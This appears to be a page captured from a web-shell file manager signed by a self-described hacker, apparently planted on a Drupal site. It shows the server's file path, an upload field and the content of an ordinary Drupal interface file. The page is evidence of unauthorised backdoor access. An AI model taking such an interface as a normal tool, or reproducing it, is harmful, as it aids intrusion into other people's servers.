test

Lazy File Manager

Lazy File Manager

Current Path : /home/cruisin2/sas.cruisingclub.org/modules/auto_entitylabel/
PPPath/home/cruisin2/sas.cruisingclub.org/modules/auto_entitylabel
Upload File :
Current File : /home/cruisin2/sas.cruisingclub.org/modules/auto_entitylabel/EntityDecoratorInterface.php

<?php
/**
 * @file
 * Contains \Drupal\auto_entitylabel\EntityDecoratorInterface.
 */

namespace Drupal\auto_entitylabel;

use Drupal\Core\Entity\ContentEntityInterface;

/**
 * Provides an interface for EntityDecorator.
 */
interface EntityDecoratorInterface {

  /**
   * Automatic entity label entity decorator.
   *
   * @param \Drupal\Core\Entity\ContentEntityInterface $entity
   *
   * @return \Drupal\auto_entitylabel\AutoEntityLabelManager|\Drupal\Core\Entity\ContentEntityInterface
   */
  public function decorate(ContentEntityInterface $entity);
}

Da3s File Manager Version 1.0, Coded By Da3s HaCkEr
Email: R0@hotmail.com